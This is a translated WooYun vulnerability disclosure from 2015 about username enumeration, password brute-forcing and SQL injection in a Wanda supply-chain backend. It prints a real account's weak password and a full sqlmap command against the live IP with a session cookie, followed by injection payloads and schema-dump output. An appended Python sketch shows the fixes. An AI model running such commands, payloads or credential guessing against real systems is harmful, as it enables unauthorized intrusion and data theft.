Vulnerability Summary

Defect ID: wooyun-2015-089805

Title: Issues in a Wanda supply chain management system, bundled (many databases)

Vendor: Dalian Wanda Group Co., Ltd.

Author: 路人甲

Submitted: 2015-01-04 10:21

Fixed: 2015-02-18 10:22

Disclosed: 2015-02-18 10:22

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-01-04: Details sent to the vendor, awaiting vendor handling
2015-01-04: Vendor has confirmed; details visible to the vendor only
2015-01-14: Details disclosed to core white hats and experts in the relevant field
2015-01-24: Details disclosed to regular white hats
2015-02-03: Details disclosed to intern white hats
2015-02-18: Details disclosed to the public

Brief description:

Earning a bit of WB is so hard; going after small vendors is one thing, but then getting ignored on top of it.
From what I've seen, Wanda confirms reports very quickly, so here's a friendly test. Issues:
1. Credential stuffing
2. SQL injection

Detailed description:

1. Credential stuffing
Wanda Department Store SCM (supply chain management) backend:
http://124.238.218.78

Around midnight on January 2 I found the issue, hit one user's password, logged in, took a look and did not go any further.


During the day on January 2, this IP was unreachable.


On the afternoon of January 3, the IP was reachable again; the guessed user credentials logged in successfully, and further testing turned up SQL injection.


Problem description:
When logging in to this system, if the username does not exist it tells you the user does not exist, so usernames can be enumerated.
I found that the login username parameter is userno, so I guessed it was a numeric account like an employee number. Testing 1, 11, 111, 1111, 11111, 111111 showed that 111111 is a valid user, so I guessed userno is a 6-digit number and iterated over users in the range 111000~119999; besides 111111, the users 111093, 111150, 112759, 112983, 113163 also exist.
Having enumerated a few valid usernames, I went on to guess passwords. After roughly 10k requests, one user's password was guessed:
112983, password 123321. I stopped guessing passwords there.
Screenshot after logging in as that user:

1.png


2. SQL injection
As the screenshot above also points out, the goods information query function has SQL injection.

2.png


Handed it to sqlmap (note the * marker and the cookie):

c:\Python27>python.exe sqlmap\sqlmap.py -u "http://124.238.218.78/report/spxxcxlb.jsp" --data="spid=&spname=1%27*--&spbarcode=" --cookie="JSESSIONID=0000WgqWKZ-xrpIerR8hmNTirAD:-1; cotreeMenu=300011.300011001.300021001.300021002.300021003.300021004.300021005.300023001.300025001.300025002.300031001.300031002.300031003.300051001.300051002.300051003.300091004.500011004; cstreeMenu=300011001"  --tables --threads=10


A hundred-odd tables; after enumerating a few of them it got boring and I paused.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: spid=&spname=1' AND 2564=2564--&spbarcode=
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: spid=&spname=1' UNION ALL SELECT CHR(113)||CHR(109)||CHR(98)||CHR(111)||CHR(113)||CHR(86)||CHR(69)||CHR(119)||CHR(119)||CHR(110)||CHR(68)||CHR(84)||CHR(84)||CHR(117)||CHR(79)||CHR(113)||CHR(103)||CHR(104)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- --&spbarcode=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: spid=&spname=1' AND 2373=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(115)||CHR(112)||CHR(74),5)--&spbarcode=
---
[13:08:47] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[13:08:47] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[13:08:47] [INFO] fetching database (schema) names
[13:08:47] [WARNING] reflective value(s) found and filtering out
[13:08:47] [WARNING] the SQL query provided does not return any output
[13:08:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:08:47] [INFO] fetching number of databases
[13:08:47] [INFO] resumed: 112
[13:08:47] [INFO] retrieving the length of query output
[13:08:47] [INFO] retrieved: 6
[13:08:52] [INFO] resuming partial value: CC
[13:08:57] [INFO] retrieved: CCZZHR
[13:08:57] [INFO] retrieving the length of query output
[13:08:57] [INFO] retrieved: 6
[13:09:11] [INFO] retrieved: DBSNMP
[13:09:11] [INFO] retrieving the length of query output
[13:09:11] [INFO] retrieved: 12
[13:09:30] [INFO] retrieved: DBUSRCARD001
[13:09:30] [INFO] retrieving the length of query output
[13:09:30] [INFO] retrieved: 11
[13:09:48] [INFO] retrieved: DBUSRGFC101
[13:09:48] [INFO] retrieving the length of query output
[13:09:48] [INFO] retrieved: 8
[13:09:59] [INFO] retrieved: DBUSRHIS
[13:09:59] [INFO] retrieving the length of query output
[13:09:59] [INFO] retrieved: 7
[13:10:09] [INFO] retrieved: DBUSRHQ
[13:10:09] [INFO] retrieving the length of query output
[13:10:09] [INFO] retrieved: 12
[13:10:27] [INFO] retrieved: DBUSRMKT1101
[13:10:27] [INFO] retrieving the length of query output
[13:10:27] [INFO] retrieved: 12
[13:10:44] [INFO] retrieved: DBUSRMKT1102
[13:10:44] [INFO] retrieving the length of query output
[13:10:44] [INFO] retrieved: 12
[13:11:10] [INFO] retrieved: DBUSRMKT1103
[13:11:10] [INFO] retrieving the length of query output
[13:11:10] [INFO] retrieved: 12
[13:11:29] [INFO] retrieved: DBUSRMKT1201
[13:11:29] [INFO] retrieving the length of query output
[13:11:29] [INFO] retrieved: 12
[13:11:47] [INFO] retrieved: DBUSRMKT1301
[13:11:47] [INFO] retrieving the length of query output
[13:11:47] [INFO] retrieved: 12
[13:12:06] [INFO] retrieved: DBUSRMKT1302
[13:12:06] [INFO] retrieving the length of query output

Proof of vulnerability:

This is not the only injection point. I suggest auditing the backend functions, since the backend is nothing but query functionality.

Fix recommendations:

1. Add a CAPTCHA to the login and tell the user whose password was leaked to change it.
2. Don't output SQL statements casually.
3. Carefully audit the backend query functions for injection.
4. Not sure whether it is a defensive measure or something else, but the system is a bit fragile and is often unreachable; I hope that wasn't me. My requests totaled at most 30~40k.
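As an added illustration of fixes 1 and 3 above (example code written for this page, not from the report or from the Wanda system), here is a Python sketch of a parameterized goods lookup beside the concatenating pattern behind the finding, plus a login response that no longer distinguishes an unknown userno from a wrong password. An in-memory SQLite table stands in for the goods table; the rows, the user store, the password and the function names are all constructed.

```python
import hmac
import sqlite3

# Constructed stand-ins for the SCM goods table and the user store (not the real schema or data).
GOODS = [("1001", "apple", "6900000000011"), ("1002", "pear", "6900000000028")]
USERS = {"112983": "constructed-password"}


def _connect():
    """Fresh in-memory database with the constructed goods rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (spid TEXT, spname TEXT, spbarcode TEXT)")
    conn.executemany("INSERT INTO goods VALUES (?, ?, ?)", GOODS)
    return conn


def query_goods_vulnerable(spname):
    """The pattern behind the finding: the spname parameter is spliced into the SQL text,
    so quote characters in the input change the query's structure."""
    sql = "SELECT spid, spname, spbarcode FROM goods WHERE spname = '" + spname + "'"
    return _connect().execute(sql).fetchall()


def query_goods_fixed(spname):
    """Bound parameter: the driver passes spname as data, never as SQL syntax."""
    sql = "SELECT spid, spname, spbarcode FROM goods WHERE spname = ?"
    return _connect().execute(sql, (spname,)).fetchall()


def login_message(userno, password):
    """Single generic message for both 'no such user' and 'wrong password', with a
    constant-time comparison run in either case, so the response does not reveal
    which userno values exist."""
    stored = USERS.get(userno)
    candidate = stored if stored is not None else "no-such-user-dummy"
    matched = hmac.compare_digest(candidate.encode(), password.encode())
    if stored is not None and matched:
        return "ok"
    return "invalid username or password"


if __name__ == "__main__":
    probe = "1' OR '1'='1"
    print("vulnerable:", query_goods_vulnerable(probe))   # every row comes back
    print("fixed:     ", query_goods_fixed(probe))        # no row is literally named that
    print(login_message("000000", "x"), "|", login_message("112983", "x"))
```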

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability Response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-01-04 10:31

Vendor reply:

Thanks to 路人甲 for the attention and contribution! Notifying the business unit for remediation right away!

Latest status:

None yet